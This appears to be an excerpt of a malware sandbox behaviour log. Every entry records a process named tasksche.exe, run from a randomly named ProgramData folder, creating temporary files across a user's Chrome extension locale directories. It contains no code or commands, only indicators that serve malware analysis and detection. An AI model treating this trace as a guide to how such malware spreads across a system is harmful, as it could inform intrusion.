Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ro\~SD9565.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ru\~SD9576.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sk\~SD9577.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sl\~SD9578.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sr\~SD9579.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sv\~SD957A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\th\~SD958A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\tr\~SD958B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\uk\~SD958C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\vi\~SD958D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\zh_CN\~SD958E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\zh_TW\~SD959F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_metadata\~SD95A0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\~SD95A1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\~SD95A2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\~SD95A3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar\~SD95A4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\bg\~SD95A5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ca\~SD95B6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs\~SD95B7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\da\~SD95B8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de\~SD95B9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el\~SD95BA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en\~SD95BB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es\~SD95BC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi\~SD95CC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\~SD95CD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr\~SD95CE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\~SD95CF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\~SD95E0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr\~SD95E1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\~SD95E2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id\~SD95E3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\~SD95E4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\~SD95F5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\~SD95F6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt\~SD95F7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv\~SD9607.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl\~SD9608.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\~SD9609.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl\~SD960A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR\~SD960B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT\~SD960C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\~SD961D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\~SD961E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\~SD961F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\~SD9620.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr\~SD9621.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv\~SD9622.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th\~SD9623.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\~SD9633.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\~SD9634.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi\~SD9635.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\~SD9636.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\~SD9637.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\~SD9638.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\~SD9639.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\~SD964A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\~SD964B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ar\~SD964C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\bg\~SD964D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ca\~SD964E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\cs\~SD965F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\da\~SD9660.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\de\~SD9661.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\el\~SD9662.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en\~SD9663.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en_GB\~SD9664.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en_US\~SD9674.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\es\~SD9675.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\es_419\~SD9676.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\et\~SD9677.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fi\~SD9678.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fil\~SD9679.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fr\~SD968A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\he\~SD968B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hi\~SD968C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hr\~SD968D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hu\~SD968E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\id\~SD968F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\it\~SD9690.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ja\~SD96A1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ko\~SD96A2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\lt\~SD96A3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\lv\~SD96A4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\nl\~SD96A5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\no\~SD96A6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pl\~SD96B6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pt_BR\~SD96B7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pt_PT\~SD96B8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ro\~SD96B9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ru\~SD96BA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sk\~SD96BB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sl\~SD96BC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sr\~SD96CD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sv\~SD96ED.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\th\~SD96FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\tr\~SD96FF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\uk\~SD9700.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\vi\~SD9701.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\zh_CN\~SD9702.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\zh_TW\~SD9712.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\~SD9713.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\~SD9714.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\~SD9715.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\af\~SD9716.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\am\~SD9727.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ar\~SD9728.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\az\~SD9729.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bg\~SD972A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bn\~SD972B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ca\~SD973C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\cs\~SD973D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\da\~SD973E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\de\~SD973F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\el\~SD974F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_GB\~SD9750.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_US\~SD9751.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es\~SD9752.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es_419\~SD9763.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\et\~SD9764.tmp
